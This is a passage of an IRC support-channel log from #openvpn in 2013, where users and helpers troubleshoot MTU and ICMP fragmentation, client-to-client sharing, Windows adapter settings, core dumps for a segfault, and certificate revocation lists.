< Poster> spacedust I believe this will show it in realtime 20:57 < Poster> sudo tcpdump -i eth0 icmp[0] = 3 and icmp[1] = 4 20:57 < hrenovo> someone gave me a link here earlier about windows firewall for vpn 20:57 < hrenovo> Poster: is this for me ? 20:57 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has quit [Quit: Leaving] 20:57 < Poster> hrenovo: it could be; though I think you were after- 20:57 < Poster> http://answers.microsoft.com/en-us/windows/forum/windows_7-networking/how-to-enable-ping-response-in-windows-7/5aff5f8d-f138-4c9a-8646-5b3a99f1cae6 20:57 <@vpnHelper> Title: How to enable ping response in windows 7 - Microsoft Community (at answers.microsoft.com) 20:59 < spacedust> Poster: but got any idea why the iptables thingy doesnt works ? 21:00 < Poster> there may not be any fragmentation needed packets 21:00 < Poster> is tcpdump returning anything? 21:00 < spacedust> Poster: impossible. i just sent a ping of 14000 bytes 21:00 < spacedust> that needs fragmentation 21:01 < spacedust> 1 0 0 LOG icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 3 code 4 LOG flags 0 level 4 prefix "IPT ICMP Frag Needed: " 21:01 < spacedust> 1 0 0 LOG icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 3 code 4 LOG flags 0 level 4 prefix "IPT ICMP Frag Needed: " 21:01 < spacedust> i haveboths on the client 21:02 < Poster> try doing a large transfer 21:02 < spacedust> Poster: PING www.google.com (173.194.44.16) 11472(11500) bytes of data. 21:02 < spacedust> Poster: okay 21:02 < Poster> google truncates 21:02 < spacedust> looking at the tcpdump also 21:02 < spacedust> truncates what do you mean ? 21:03 < Poster> ping -s 1000 -c 1 www.google.com 21:03 < Poster> PING www.google.com (74.125.26.99) 1000(1028) bytes of data. 21:03 < Poster> 72 bytes from vh-in-f99.1e100.net (74.125.26.99): icmp_seq=1 ttl=43 (truncated) 21:04 < spacedust> Poster: it didnt said (truncate) at the end of the message ... but i tryed www.cnet.com and now it says :) 21:04 < spacedust> but not for google :) 21:04 < hrenovo> the method in the above link worked 21:04 < hrenovo> the first suggestion 21:05 < hrenovo> ok, so ping works to windows clients now 21:05 < hrenovo> which is nice 21:05 < hrenovo> but this will not apply for files sharing if i'm not mistaken 21:06 < hrenovo> what exactly does client-to-client do ? 21:06 < Poster> yep, you have to open those individually 21:06 < spacedust> btw what does this truncate means ? 21:06 < spacedust> Poster: the tcpdump shows my nothing at all 21:06 < Poster> client-to-client allows VPN clients to connect to eachother 21:06 < Poster> VPN client A can ping VPN client B across the VPN link 21:07 < hrenovo> but besides pinging 21:07 < Poster> file sharing, printing, video, whatever you can do over a network 21:08 < hrenovo> is client-to-client enough for file & printer sharing ? 21:08 < hrenovo> oh 21:08 < hrenovo> nice ! 21:08 < Poster> between clients yes 21:08 < hrenovo> yeah that's cool 21:08 < Poster> you don't need it if the files and printers are behind the VPN server 21:08 < hrenovo> so the rest is just firewall ? 21:08 < Poster> mostly 21:09 < Poster> be careful with client to client though, you leave all other clients exposed to a possibly malicious client or client with malware 21:10 < hrenovo> let me try something really quick. I will try to access a computer that already has active file shares across the network. 21:10 < hrenovo> but I want to access the file shares on openvpn interface. it should work right ? 21:10 < spacedust> Poster: i have no single package failure , looking with mtr www.cnet.com which is 20hops away :) openvpn ROX ! 21:10 < spacedust> THANKS OPENVPN 21:11 < Poster> hrenovo: yes it can 21:11 < Poster> remember that OpenVPN is just creating a virtual network, so anything you can do on a network, you can (pretty much) do on an OpenVPN link 21:12 < Poster> you generally just have to cope with less bandwidth and higher latency 21:14 < spacedust> Poster: i know its a bit offtopic but its a network related question 21:14 < spacedust> my eth0 has two ips :) 21:14 < hrenovo> hah! it worked 21:14 < spacedust> on is in /25 and the other in /24 :P 21:14 < spacedust> same ip different neteworks, how could i remove it and readd it ? 21:14 < spacedust> manually 21:15 < Poster> so you have say an eth0 with a subnet mask of 255.255.255.0 and eth0:0 with a subnet mask of 255.255.255.128 ? 21:18 < spacedust> http://openvpn.net/archive/openvpn-users/2004-11/msg00649.html hahh + If your data stream is compressible, you can potentially gain back all of + 8bytes more :P 21:18 <@vpnHelper> Title: Re: [Openvpn-users] Overhead added to each packet by OpenVPN? (at openvpn.net) 21:18 < spacedust> Poster: no :) 21:19 < spacedust> Poster: i have eth0 with ip x.x.x.x/24 bcast:24 ... netmask/24 ... 21:19 < spacedust> and on the same eth0 i have xx.x.x./24 bcast:24 ... netmask/24 :) 21:19 < Poster> two different IP addresses, both /24 ? 21:20 -!- jaded-g0n [~pizo@113.210.96.159] has quit [Ping timeout: 276 seconds] 21:24 < hrenovo> Poster: so far so good, everything is very smooth 21:25 < hrenovo> Poster: I wonder which NAS device for home would work nicely as an openvpn client ? Which manufacturer / model ? 21:27 < Poster> I really don't know, I usually just bang around with old hardware and open source software 21:28 < Poster> if you want a true NAS device I'd imagine you'd want something with some variation of a known supported platform 21:29 < Poster> that being said, something based on Windows, BSD or Linux might be usable, most devices have specialized versions 21:29 < Poster> so the needed components may have been removed 21:30 < Poster> do you have hardware you want to use or are you just shopping? 21:31 < Poster> keep in mind you can also use an old broadband router with OpenWRT or DD-WRT to use for OpenVPN services 21:31 < hrenovo> well I have dd-wrt 21:32 < hrenovo> I had openvpn server set up in dd-wrt a few years back 21:32 < hrenovo> I wonder if it can be used as a client 21:32 < Poster> yep 21:32 < Poster> the same binary can do either, it depends on which configuration you point it to 21:34 < hrenovo> let me check the settings 21:34 < hrenovo> I hope it can all be configured as a client using dd-wrt gui 21:39 < Poster> I would imagine so 21:41 -!- jaded-g0n [~pizo@113.210.102.139] has joined #openvpn 21:42 < jaded-g0n> --ifconfig local ad 21:42 < jaded-g0n> dress and the internal DHCP server address -- both are set to 10.9.0.254 -- plea 21:42 < jaded-g0n> se use the --ip-win32 dynamic option to choose a different free address from the 21:42 < jaded-g0n> Is this a conflict of internal ip? 21:42 < jaded-g0n> sorry my english is macibai 21:44 < jaded-g0n> i guess nobody is lanjiao around to answer it? 21:44 < jaded-g0n> =-( 21:45 < Poster> I am just guessing, but I think you need to use a unique IP address for the OpenVPN server 21:45 < Poster> not used on your local ethernet adapter 21:45 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:49 -!- master_of_master [~master_of@p4FF24C20.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 21:50 -!- master_of_master [~master_of@p4FF24934.dip.t-dialin.net] has joined #openvpn 22:11 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 22:15 < jaded-g0n> what does ip-win32 do? 22:26 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 22:26 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 22:26 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 22:45 < pekster> jaded-g0n: It lets you decide now to have Windows assign the IP to the virtual adapter. The 'adaptive' setting is the default, and that error message you got is suggesting you try the 'dynamic' setting instead 22:52 -!- brute11k [~brute@89.249.235.123] has joined #openvpn 22:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 23:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 23:04 -!- master_o1_master [~master_of@p4FF24E68.dip.t-dialin.net] has joined #openvpn 23:08 -!- master_of_master [~master_of@p4FF24934.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 23:20 < jaded-g0n> pekster: so how do i tell openvpn to try the "dynamic" setting? 23:20 < jaded-g0n> is it a configuration on the server, or client, or both? 23:23 < pekster> clienet, And you set the directive I just noted with the dynamic setting. The manpage will help if you're still confused if you search for --ip-win32 23:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn --- Day changed Thu Mar 21 2013 00:17 -!- brute11k [~brute@89.249.235.123] has quit [Ping timeout: 264 seconds] 00:28 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 00:44 -!- master_o1_master [~master_of@p4FF24E68.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 00:46 -!- master_of_master [~master_of@p4FF24E30.dip.t-dialin.net] has joined #openvpn 00:53 < jaded-g0n> !man 00:53 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 00:55 < pekster> So, 'ip-win32 dynamic' to use the dynamic option 00:55 < pekster> Add leading dashes if you're supplying it on the command line (dashes are optional in your config file) 01:07 -!- master_o1_master [~master_of@p4FF24F08.dip.t-dialin.net] has joined #openvpn 01:10 -!- master_of_master [~master_of@p4FF24E30.dip.t-dialin.net] has quit [Ping timeout: 258 seconds] 01:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 01:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 01:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 01:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 01:43 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:54 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:55 -!- master_of_master [~master_of@p4FF24555.dip.t-dialin.net] has joined #openvpn 01:59 -!- master_o1_master [~master_of@p4FF24F08.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 02:23 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn 02:26 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds] 02:47 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 03:05 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 03:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:18 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 03:18 < y4h0> hey there 03:18 < y4h0> do i need to restart openvpn when i made a change in server.conf ? 03:18 <@EugeneKay> Yes. 03:19 < y4h0> tnk you 03:26 -!- JackWinter1 [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 03:28 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 03:31 -!- JackWinter1 [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 03:36 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 03:44 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 03:45 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 252 seconds] 03:45 -!- mirco_ is now known as mirco 03:46 -!- jaded-g0n [~pizo@113.210.102.139] has quit [Ping timeout: 276 seconds] 04:10 -!- master_o1_master [~master_of@p4FF24415.dip.t-dialin.net] has joined #openvpn 04:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:14 -!- master_of_master [~master_of@p4FF24555.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 04:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 04:38 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has quit [Quit: Orbi] 04:52 -!- master_of_master [~master_of@p4FF24EC6.dip.t-dialin.net] has joined #openvpn 04:55 -!- master_o1_master [~master_of@p4FF24415.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 05:41 -!- tcamuso_ [tcamuso@nat/redhat/x-baiqpapqcpburuam] has joined #openvpn 05:46 -!- jaded-g0n [~pizo@ks-112-190.tm.net.my] has joined #openvpn 06:16 -!- brute11k [~brute@89.249.231.53] has joined #openvpn 06:18 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 06:34 < spacedust> hi 06:35 < spacedust> is mtu-test a good way to test if mtu settings are correct ? i am guessing so :) just want to make sure its foolproof :) 06:40 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Saliendo] 06:45 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 06:51 -!- jaded-g0n [~pizo@ks-112-190.tm.net.my] has quit [] 06:52 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 06:57 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Ping timeout: 245 seconds] 07:01 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 07:02 < kjs> Getting a weird issue... OpenVPN is dog slow, I restart the service and it's fast then gets slower and slower to a total crawl. 07:14 <@ecrist> tcp or udp? 07:18 < kjs> udp 07:18 <@ecrist> what version of openvpn? 07:19 -!- novaflash is now known as novaflash_away 07:19 -!- novaflash_away is now known as novaflash 07:20 < kjs> ecrist: openvpn-2.2.2-1.el6.rf.i686 07:20 <@ecrist> upgrade to 2.3.0 and see if your problem persists 07:21 < kjs> it's running on a cluster, that's not possible right now. 07:21 <@ecrist> feel free to come back when that's done. :) 07:21 < havoc> kjs: try monitoring bandwidth usage, and cpu usage 07:22 < kjs> is this a know problem in 2.2.0 then ecrist ? 07:22 < havoc> also make sure there is no firewalling/shaping in effect that could be throttling the traffic 07:23 <@ecrist> kjs: there are a ton of fixes in 2.3, so it's hard to say. we only support the most recent version of openvpn here, and try not to dwell on past releases. 07:23 < kjs> understood 07:41 < spacedust> makes sense to support latest development :) 07:42 < spacedust> the mtu-test result are : openvpn[2992]: NOTE: Empirical MTU test completed [Tried,Actual] local->remote=[1557,1557] remote->local=[1557,1557] 07:42 < spacedust> so what does that conclude ? that in using a 1557 mtu ? 08:10 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 08:11 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 08:21 -!- master_o1_master [~master_of@p4FF24AE2.dip.t-dialin.net] has joined #openvpn 08:24 -!- master_of_master [~master_of@p4FF24EC6.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 08:30 < MacGyver> Hmm. 08:30 < MacGyver> ^CThu Mar 21 14:28:33 2013 RESOLVE: signal received during DNS resolution attempt 08:30 < MacGyver> Segmentation fault 08:30 < MacGyver> My guess is that's a bug? 08:31 < MacGyver> (I did send the sigterm. The segmentation fault is what I mean.) 08:43 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has joined #openvpn 08:45 <@ecrist> did you get a core dump? 08:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 08:46 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 258 seconds] 08:51 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 08:58 < MacGyver> Unfortunately, coredumps aren't enabled by default on this machine. 08:58 < MacGyver> I can try to reproduce. 08:58 <@ecrist> what version of openvpn? 08:58 <@ecrist> a core dump would be needed to really do much, unless we can find a way to reproduce 08:58 < MacGyver> OpenVPN 2.3.0 i686-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [eurephia] [MH] [IPv6] built on Feb 9 2013 08:58 < MacGyver> On arch linux, 32 bit. 08:59 < MacGyver> Anything special I have to do for OpenVPN to enable dumps? 08:59 < MacGyver> Or is the ulimit enough? 09:00 <@ecrist> I think it's just theulimit 09:01 < MacGyver> Oh, hmm. 09:01 < MacGyver> Maaaybe it díd generate a dump. 09:02 < MacGyver> Apparently the dump pattern for systemd-based systems makes it end up in the systemctl-log. 09:03 < MacGyver> Hmm, nope. 09:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection timed out] 09:08 < MacGyver> Right, core dumps enabled, let's try to reproduce. 09:09 < MacGyver> Which means I'll be afk for a sec, it involves shutting off the phone (USB-tethered), waiting for DNS-resolutions to fail and then sigterming :P 09:12 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 09:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Read error: Connection reset by peer] 09:15 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 09:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:25 < MacGyver> Hmm. 09:25 < MacGyver> Nope. 09:25 < MacGyver> Clean shutdown this time. 09:26 < MacGyver> Could be a race condition, since usually it takes a while before the process reports receiving the signal, and this time it was instant. 09:26 < MacGyver> I'll leave coredumps enabled. 09:32 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0] 09:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:39 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 256 seconds] 09:44 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 09:44 -!- y4h0 [~yavor@78.128.23.17] has quit [Client Quit] 09:48 < MacGyver> Supposing I set the ulimit on coredumps for root to unlimited, but only for root. If I then start an openvpn process as root *which then drops privileges*, will it generate a coredump? 09:48 < MacGyver> I figure this is general kernel behaviour and not distro-specific, so that's why I might as well ask here as well. 09:48 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 09:50 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has quit [Ping timeout: 256 seconds] 09:51 <@ecrist> MacGyver: no, it won't 09:51 <@ecrist> because it's not a root process at that point 09:51 < MacGyver> But ulimits are set at the start of the process, are they not? 09:52 < MacGyver> (I don't want to enable coredumps for all users and groups by default.) 09:52 < MacGyver> (But I will if I have to.) 09:53 <@ecrist> MacGyver: try not dropping privs for now, or enabling coredumps for the owner of the openvpn process 09:55 < MacGyver> That would be nobody. 09:55 < MacGyver> As in, literally, nobody. 09:56 * MacGyver has no idea if and how ulimits are even imposed on that user. 09:56 < MacGyver> And not dropping privs "taints" the setup - the segfault might be caused by the fact that it's at that point running as nobody. 09:57 <@ecrist> then, for testing, enable coredumps for everyone 09:58 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 09:58 -!- cippaciong [~cippacion@95.236.151.104] has left #openvpn ["WeeChat 0.4.0"] 10:04 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 252 seconds] 10:05 < MacGyver> Ah, I think I understand why it won't be dumped. 10:06 < MacGyver> The flag set by PR_SET_DUMPABLE gets cleared when a program drops privs, if I understand this correctly. 10:06 < MacGyver> And it's too much effort to fix this "cleanly". 10:06 < MacGyver> So coredumps, coredumps for everyone! it is. 10:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 10:10 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has joined #openvpn 10:10 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 10:11 < cippaciong> !welcome 10:11 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 10:11 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:12 < cippaciong> hello 10:12 < cippaciong> I was asking how to use 192.168.0.0/24 ip class in openvpn 10:12 < cippaciong> but I think it's not a good idea 10:12 < cippaciong> 16:11 @vpnHelper » !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:13 < rob0> If you have any users using off-the-shelf routers, including many public wifi hotspots, they're not going to be able to route to those networks through your VPN. 10:14 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:15 < cippaciong> let's say I just entered my LAN unsing the VPN and I have ip 10.8.0.6 10:15 < cippaciong> and in my LAN PCs has 192.168.0.X ip 10:15 < cippaciong> how can I ping/do anything with them? 10:16 < cippaciong> If I ping the server with 192.168.0.9 (the server ip) it doesn't work 10:16 < cippaciong> but if I use 10.8.0.1 then it works 10:19 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:21 -!- cippaciong [~cippacion@95.236.151.104] has quit [Remote host closed the connection] 10:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 240 seconds] 10:23 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 10:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:26 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:34 < rob0> !serverlan' 10:34 < rob0> !serverlan 10:34 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 10:34 < rob0> see the flowchart 10:37 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 10:39 < cippaciong> thanks rob0 10:40 < cippaciong> OT isn't vpnHelper supposed to give me those messages also querying it? 10:41 < rob0> I'm not sure. Probably, but you'd have to do something like "/msg vpnHelper whatis #openvpn serverlan" 10:41 < rob0> (not tested) 10:42 < rob0> !factoids 10:42 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 10:42 < cippaciong> thanks again 10:42 < rob0> ^^ might be of interest 10:42 < cippaciong> btw the msg method works 10:43 < rob0> cool 10:46 < cippaciong> I have to go now, I'll study a bit and then come back again :D 10:46 < cippaciong> thanks again rob0 10:46 -!- cippaciong [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0] 10:51 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 10:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:00 -!- raidz_away is now known as raidz 11:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:32 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 11:32 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 11:32 -!- mode/#openvpn [+o plaisthos] by ChanServ 11:45 < jzaw> !route_outside_openvpn 11:45 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 11:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:49 < jzaw> !tunortap 11:49 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 11:49 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 12:02 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:02 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:02 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:02 -!- mode/#openvpn [+o krzee] by ChanServ 12:04 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:10 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 12:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 12:43 < Olipro> if you modify a CRL file, can OpenVPN 2.3 be SIGHUP/SIGUSR1'd to reload it? 12:47 < rob0> hmm, I would think that the CRL would be read for every new/renewed connection, not just at startup time 12:48 <@EugeneKay> I believe the CRL, like the rest of the x.509 stuff, is reloaded when you reinit(triggered by ping-restart or SIGUSR1), but I'm not sure 12:48 <@EugeneKay> Feel free to test 12:48 < pekster> Correct, if you have a --crl-verify updating the file takes effect right away 12:49 < pekster> However, remember that currently connected clients will *not* be disconnected (kill them manually via management or restart to kick everyone off) until the re-keying, done hourly by default 12:50 <@dazo> Olipro: IIRC ... the CRL should be re-read on each check, to ensure it's up-to-date ... I think that was what I found out when testing it many years ago, but my memory is a bit vague now 12:50 < Olipro> what about if a CRL'd client is already connected? 12:51 < Olipro> any way to have it re-read and bounce someone who's been revoked? 12:51 <@dazo> Olipro: again, IIRC, it does the CRL check on each re-negotiation 12:51 < Olipro> super 12:51 < Olipro> I'll get my PFY to test it later 12:55 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 12:56 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 12:57 < pekster> Olipro: My SOP for revoking a currently valid cert is to revoke, publish CRL, check status of server (status file or USR2 signal in logs) andn then use the management interface to 'kill' the connection if active. A temporary mitigating 'disable' entry can be put in the ccd file too, while you deal with the CRL stuff 13:01 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:02 -!- dazo is now known as dazo_afk 13:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 13:14 -!- epochwolf [~root@unaffiliated/epochwolf] has left #openvpn ["Textual IRC Client: http://www.textualapp.com/"] 13:14 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has joined #openvpn 13:23 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:24 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 13:25 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 13:26 -!- mallxs [~mallxs@84.246.31.190] has quit [Quit: ChatZilla 0.9.90 [Iceweasel 10.0.12/20130119084230]] 13:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:39 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has quit [Ping timeout: 264 seconds] 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:01 < jzaw> pekster, as i rationalised the use of tcp ... should i really use tcp-delay also ? 14:01 < jzaw> how critical is that? 14:03 < pekster> --tcp-nolatency? It'll reduce latency at a possible slight reduction in theoretical efficiency (you've already given that up though using tcp anyway) and possibly perform worse in the face of packet loss due to "more" retransmits occurring 14:03 < pekster> Erm, --tcp-nodelay 14:20 < jzaw> yes sorry .. i was typing from memory hehe 14:21 < jzaw> i guess i could do some empirical tests for voip and see how udp tunnels fare 14:22 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:24 < hrenovo> greetings. What rule should be enabled in windows 7 firewall for file and printer sharing over openvpn adapter. I eanbled to allow all rules listed in inbound rules for file and printer sharing in win7 firewall, but still can't acces it when the firewall is turned on. 14:24 < hrenovo> ideas ? 14:26 < pekster> You're better off asking in a channel specalizing in Windows configuration, or Windows-centric forms. IIRC, there's a builtin firewall rule for "Printer & File Sharing" or something similar 14:27 < hrenovo> yeah I can see file and printer sharing in the list of inbound firewall rules 14:28 < hrenovo> many of them were disabled meaning it was blocked 14:28 < hrenovo> I enabled all of them, but still can't access shares 14:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:32 < hrenovo> pekster: the problem is that openvpn installs the adapter on a public interface 14:32 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 14:32 < hrenovo> it should be installed as a private network, but not public 14:32 < hrenovo> that' is the main problem 14:33 < penk> hi folks, does anyone know where the connect log on a mac is for the openvpn client? I'm tryign to connect ot my openvpn server and all I get is a Growl popup "Error" "Connect error" 14:33 < penk> i just reinstalled my mac, other users are fine. this is just local to me. 14:34 < pekster> hrenovo: So change it 14:34 < hrenovo> pekster: how can I change it ? 14:34 < pekster> This channel isn't really going to be of use if you need networking support under Windows 14:34 < pekster> The control pannel network thingy under Windows OS's lets you change pretty much all of that 14:34 < rob0> s/This channel/IRC/ :) 14:35 < pekster> Failing that, there's usually an ill-documented netsh or API interface to it as well. Google-fu would be a better bet, or whine on msdn if you don't find it in an hour of searching 14:38 < 